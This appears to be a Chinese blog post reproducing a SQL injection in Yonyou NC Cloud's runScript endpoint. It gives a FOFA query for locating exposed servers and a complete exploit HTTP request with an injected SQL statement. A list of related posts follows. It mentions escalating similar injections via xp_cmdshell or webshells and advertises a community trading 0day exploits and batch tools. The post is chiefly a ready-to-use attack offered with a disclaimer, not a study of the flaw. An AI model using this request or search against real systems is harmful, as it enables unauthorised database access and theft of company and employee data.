【漏洞复现】用友NC Cloud 存在SQL注入

最新推荐文章于 2024-11-29 18:39:51 发布
最新推荐文章于 2024-11-29 18:39:51 发布
阅读量397 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KKleeeaa/article/details/137000107

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01FOFA语句

FOFA:app="用友-NC-Cloud"

0x02 漏洞POC

POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Accept-Encoding: gzip
 
key=1&script=select 1,111*111,user,4,5,6,7,8,9,10 from dual

用友_NCCloud_queryStaffByName接口SQL注入(含批量验证poc)
weixin_43567873的博客
04-15 224
用友_NCCloud_queryStaffByName接口SQL注入(含批量验证poc)
用友NC show_download_content SQL注入
iSee857的博客
09-04 463
用友NCNC Cloud 中show_download_content接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。Fofa:(product="用友-UFIDA-NC" && icon_hash="1085941792") || app="用友-NC-Cloud"官方已发布补丁 请及时修复。
漏洞复现用友NC-Cloud系统queryRuleByDeptId存在SQL注入漏洞
qq_34780861的博客
04-03 691
NC Cloud用友推出的大型企业数字化平台。用友NC-Cloud系统queryRuleByDeptId存在SQL注入漏洞
用友NC Cloud runScript SQL注入漏洞复现_友nc cloud系统runscript存在sql注入漏洞复现
2401_83974199的博客
04-14 565
用友NC Cloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
漏洞复现用友-NC-Cloud-runScript-sql注入
qq_34780861的博客
03-21 1060
用友-nc-cloud runscript sql注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
用友NCCloud系统runScript存在SQL注入漏洞
qq_36334672的博客
04-02 638
用友NC Cloud系统中的runScript接口被发现存在SQL注入SQL Injection)安全漏洞。攻击者通过构造恶意的输入数据,能够将非法的SQL命令插入到原本正常的数据库查询语句中,从而绕过授权机制,未经授权地直接访问、修改或删除数据库中的敏感信息。
漏洞复现用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
qq_34780861的博客
04-02 631
NC Cloud用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
用友NC-Cloud process SQL注入漏洞复现及POC
mashiro_hibiki的博客
11-29 385
【代码】用友NC-Cloud process SQL注入漏洞复现及POC。
用友NC Cloud runScript SQL注入漏洞复现
0xSec
03-20 880
用友NCCloud /ncchr/attendScript/internal/runScript接口处存在SQL注入漏洞,未授权的攻击者可以通过此漏洞获取数据库权限,进一步利用可导致服务器失陷。
用友NC Cloud queryPsnInfo SQL注入漏洞复现
0xSec
08-03 564
用友NC Cloud queryPsnInfo 接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
漏洞复现用友 NC PaWfm SQL注入漏洞
qq_67810151的博客
04-13 543
用友NC 存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
用友NCNC Cloud show_download_content SQL注入漏洞复现
0xSec
09-03 840
用友NCNC Cloud /ebvp/infopub/show_download_content接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
【HW必备】用友NC-Cloud存在17处漏洞合集
小司机的奥拓
06-24 1546
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。如果师傅已经是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享。
用友 NC showcontent SQL注入漏洞复现
0xSec
04-20 817
用友NC /ebvp/infopub/showcontent 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
用友NC downTax/download SQL注入漏洞复现
0xSec
05-17 663
用友NC /portal/pt/downTax/download接口的classid参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9572
用友NC 漏洞汇总
用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录
kelenwait的博客
06-23 8074
简介 用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。 漏洞情况 用友OA_U8 存在SQL 注入 用友NCCloud FS文件管理 SQL 注入 用友NC bsh.servlet.BshServlet 远程命令执行 用友NC 任意文件上传 getShell 漏洞复现 1.用友 OA_U8 SQL 注入 poc /yyoa/common/js/menu/tes
用友-NC-Cloud注入
最新发布
03-28
好的,我需要回答用户关于用友NC Cloud注入漏洞的修复方案和如何防止SQL注入的问题。首先,我需要整理已有的信息,用户提供的两个引用提到了两个不同的接口存在SQL注入漏洞:一个是/ncchr/attendScript/internal/run...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值